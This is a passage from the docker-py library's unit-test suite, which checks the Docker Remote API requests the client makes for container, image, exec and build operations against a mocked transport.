lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
def test_start_container_with_binds_ro(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
if six.PY2:
try:
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
mount_origin: {
"bind": mount_dest,
"ro": True
}
}
)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
mount_origin: {
"bind": mount_dest,
"ro": True
}
}
)
def test_start_container_with_binds_rw(self):
mount_dest = '/mnt'
mount_origin = '/tmp'
if six.PY2:
try:
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
mount_origin: {"bind": mount_dest, "ro": False}
}
)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
mount_origin: {"bind": mount_dest, "ro": False}
}
)
def test_start_container_with_port_binds(self):
self.maxDiff = None
if six.PY2:
try:
self.client.start(fake_api.FAKE_CONTAINER_ID, port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
})
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(fake_api.FAKE_CONTAINER_ID, port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
})
def test_start_container_with_links(self):
# one link
link_path = 'path'
alias = 'alias'
if six.PY2:
try:
self.client.start(fake_api.FAKE_CONTAINER_ID,
links={link_path: alias})
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID, links={link_path: alias}
)
def test_start_container_with_multiple_links(self):
link_path = 'path'
alias = 'alias'
if six.PY2:
try:
self.client.start(
fake_api.FAKE_CONTAINER_ID,
links={
link_path + '1': alias + '1',
link_path + '2': alias + '2'
}
)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID,
links={
link_path + '1': alias + '1',
link_path + '2': alias + '2'
}
)
def test_start_container_with_links_as_list_of_tuples(self):
# one link
link_path = 'path'
alias = 'alias'
if six.PY2:
try:
self.client.start(fake_api.FAKE_CONTAINER_ID,
links=[(link_path, alias)])
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(fake_api.FAKE_CONTAINER_ID,
links=[(link_path, alias)])
def test_start_container_privileged(self):
if six.PY2:
try:
self.client.start(fake_api.FAKE_CONTAINER_ID, privileged=True)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(fake_api.FAKE_CONTAINER_ID, privileged=True)
def test_start_container_with_dict_instead_of_id(self):
try:
self.client.start({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_restart_policy(self):
try:
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
restart_policy={
"Name": "always",
"MaximumRetryCount": 0
}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['RestartPolicy'] = {
"MaximumRetryCount": 0, "Name": "always"
}
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_added_capabilities(self):
try:
self.client.create_container(
'busybox', 'true',
host_config=create_host_config(cap_add=['MKNOD'])
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['CapAdd'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_dropped_capabilities(self):
try:
self.client.create_container(
'busybox', 'true',
host_config=create_host_config(cap_drop=['MKNOD'])
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['CapDrop'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_devices(self):
try:
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
devices=['/dev/sda:/dev/xvda:rwm',
'/dev/sdb:/dev/xvdb',
'/dev/sdc']
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Devices'] = [
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvda',
'PathOnHost': '/dev/sda'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvdb',
'PathOnHost': '/dev/sdb'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/sdc',
'PathOnHost': '/dev/sdc'}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_dict(self):
labels_dict = {
six.text_type('foo'): six.text_type('1'),
six.text_type('bar'): six.text_type('2'),
}
try:
self.client.create_container(
'busybox', 'true',
labels=labels_dict,
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_list(self):
labels_list = [
six.text_type('foo'),
six.text_type('bar'),
]
labels_dict = {
six.text_type('foo'): six.text_type(),
six.text_type('bar'): six.text_type(),
}
try:
self.client.create_container(
'busybox', 'true',
labels=labels_list,
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_resize_container(self):
try:
self.client.resize(
{'Id': fake_api.FAKE_CONTAINER_ID},
height=15,
width=120
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/resize',
params={'h': 15, 'w': 120},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_rename_container(self):
try:
self.client.rename(
{'Id': fake_api.FAKE_CONTAINER_ID},
name='foobar'
)
except Exception as e:
self.fail('Command shold not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/rename',
params={'name': 'foobar'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_wait(self):
try:
self.client.wait(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def test_wait_with_dict_instead_of_id(self):
try:
self.client.wait({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
raise e
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = docker.Client(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = docker.Client(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http_unix_triple_slash(self):
c = docker.Client(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = docker.Client(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = docker.Client(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_logs(self):
try:
logs = self.client.logs(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_logs_with_dict_instead_of_id(self):
try:
logs = self.client.logs({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_log_streaming(self):
try:
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 1, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=True
)
def test_log_tail(self):
try:
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=False, tail=10)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 10},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
def test_diff(self):
try:
self.client.diff(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_diff_with_dict_instead_of_id(self):
try:
self.client.diff({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_port(self):
try:
self.client.port({'Id': fake_api.FAKE_CONTAINER_ID}, 1111)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_stop_container(self):
timeout = 2
try:
self.client.stop(fake_api.FAKE_CONTAINER_ID, timeout=timeout)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_stop_container_with_dict_instead_of_id(self):
timeout = 2
try:
self.client.stop({'Id': fake_api.FAKE_CONTAINER_ID},
timeout=timeout)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_exec_create(self):
try:
self.client.exec_create(fake_api.FAKE_CONTAINER_ID, ['ls', '-1'])
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0], url_prefix + 'containers/{0}/exec'.format(
fake_api.FAKE_CONTAINER_ID
)
)
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'AttachStdout': True,
'Container': fake_api.FAKE_CONTAINER_ID,
'Cmd': ['ls', '-1'],
'Privileged': False,
'AttachStdin': False,
'AttachStderr': True,
'User': ''
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_start(self):
try:
self.client.exec_start(fake_api.FAKE_EXEC_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0], url_prefix + 'exec/{0}/start'.format(
fake_api.FAKE_EXEC_ID
)
)
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'Detach': False,
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_inspect(self):
try:
self.client.exec_inspect(fake_api.FAKE_EXEC_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0], url_prefix + 'exec/{0}/json'.format(
fake_api.FAKE_EXEC_ID
)
)
def test_exec_resize(self):
try:
self.client.exec_resize(fake_api.FAKE_EXEC_ID, height=20, width=60)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'exec/{0}/resize'.format(fake_api.FAKE_EXEC_ID),
params={'h': 20, 'w': 60},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_pause_container(self):
try:
self.client.pause(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/pause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_unpause_container(self):
try:
self.client.unpause(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/unpause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_kill_container(self):
try:
self.client.kill(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_dict_instead_of_id(self):
try:
self.client.kill({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_signal(self):
try:
self.client.kill(fake_api.FAKE_CONTAINER_ID, signal=signal.SIGTERM)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/kill',
params={'signal': signal.SIGTERM},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container(self):
try:
self.client.restart(fake_api.FAKE_CONTAINER_ID, timeout=2)
except Exception as e:
self.fail('Command should not raise exception : {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container_with_dict_instead_of_id(self):
try:
self.client.restart({'Id': fake_api.FAKE_CONTAINER_ID}, timeout=2)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container(self):
try:
self.client.remove_container(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container_with_dict_instead_of_id(self):
try:
self.client.remove_container({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_link(self):
try:
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export(self):
try:
self.client.export(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export_with_dict_instead_of_id(self):
try:
self.client.export({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container(self):
try:
self.client.inspect_container(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container_empty_id(self):
try:
self.client.inspect_container('')
except docker.errors.NullResource as e:
self.assertEqual(
e.args[0], 'image or container param is undefined'
)
else:
self.fail('Command expected NullResource exception')
def test_container_stats(self):
try:
self.client.stats(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/stats',
timeout=60,
stream=True
)
##################
# IMAGES TESTS #
##################
def test_pull(self):
try:
self.client.pull('joffrey/test001')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertFalse(args[1]['stream'])
def test_pull_stream(self):
try:
self.client.pull('joffrey/test001', stream=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertTrue(args[1]['stream'])
def test_commit(self):
try:
self.client.commit(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'commit',
data='{}',
headers={'Content-Type': 'application/json'},
params={
'repo': None,
'comment': None,
'tag': None,
'container': '3cc2351ab11b',
'author': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_image(self):
try:
self.client.remove_image(fake_api.FAKE_IMAGE_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/e9aa60c60128',
params={'force': False, 'noprune': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_history(self):
try:
self.client.history(fake_api.FAKE_IMAGE_NAME)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/history',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image(self):
try:
self.client.import_image(
fake_api.FAKE_TARBALL_PATH,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': fake_api.FAKE_TARBALL_PATH
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_bytes(self):
stream = (i for i in range(0, 100))
try:
self.client.import_image(
stream,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': '-',
},
headers={
'Content-Type': 'application/tar',
},
data=stream,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_image(self):
try:
self.client.import_image(
image=fake_api.FAKE_IMAGE_NAME,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromImage': fake_api.FAKE_IMAGE_NAME
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image(self):
try:
self.client.inspect_image(fake_api.FAKE_IMAGE_NAME)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image_empty_id(self):
try:
self.client.inspect_image('')
except docker.errors.NullResource as e:
self.assertEqual(
e.args[0], 'image or container param is undefined'
)
else:
self.fail('Command expected NullResource exception')
def test_insert_image(self):
try:
self.client.insert(fake_api.FAKE_IMAGE_NAME,
fake_api.FAKE_URL, fake_api.FAKE_PATH)
except docker.errors.DeprecatedMethod as e:
self.assertTrue(
docker.utils.compare_version('1.12', self.client._version) >= 0
)
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/insert',
params={
'url': fake_api.FAKE_URL,
'path': fake_api.FAKE_PATH
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image(self):
try:
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_with_tag(self):
try:
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(
fake_api.FAKE_IMAGE_NAME, tag=fake_api.FAKE_TAG_NAME
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/push',
params={
'tag': fake_api.FAKE_TAG_NAME,
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_stream(self):
try:
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME, stream=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image(self):
try:
self.client.tag(fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_tag(self):
try:
self.client.tag(
fake_api.FAKE_IMAGE_ID,
fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': 'tag',
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_force(self):
try:
self.client.tag(
fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME, force=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 1
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_get_image(self):
try:
self.client.get_image(fake_api.FAKE_IMAGE_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/e9aa60c60128/get',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_load_image(self):
try:
self.client.load_image('Byte Stream....')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/load',
data='Byte Stream....',
timeout=DEFAULT_TIMEOUT_SECONDS
)
#################
# BUILDER TESTS #
#################
def test_build_container(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
try:
self.client.build(fileobj=script)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_pull(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
try:
self.client.build(fileobj=script, pull=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_stream(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
try:
self.client.build(fileobj=script, stream=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_custom_context(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
context = docker.utils.mkbuildcontext(script)
try:
self.client.build(fileobj=context, custom_context=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_custom_context_gzip(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
context = docker.utils.mkbuildcontext(script)
gz_context = gzip.GzipFile(fileobj=context)
try:
self.client.build(
fileobj=gz_context,
custom_context=True,
encoding="gzip"
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_remote_with_registry_auth(self):
try:
self.client._auth_configs = {
'https://example.com': {
'user': 'example',
'password': 'example',
'email': 'example@example.com'
}
}
self.client.build(path='https://github.com/docker-library/mongo')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_with_named_dockerfile(self):
try:
self.client.build('.', dockerfile='nameddockerfile')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_with_container_limits(self):
try:
self.client.build('.', container_limits={
'memory': 1024 * 1024,
'cpusetcpus': 1,
'cpushares': 1000,
'memswap': 1024 * 1024 * 8
})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
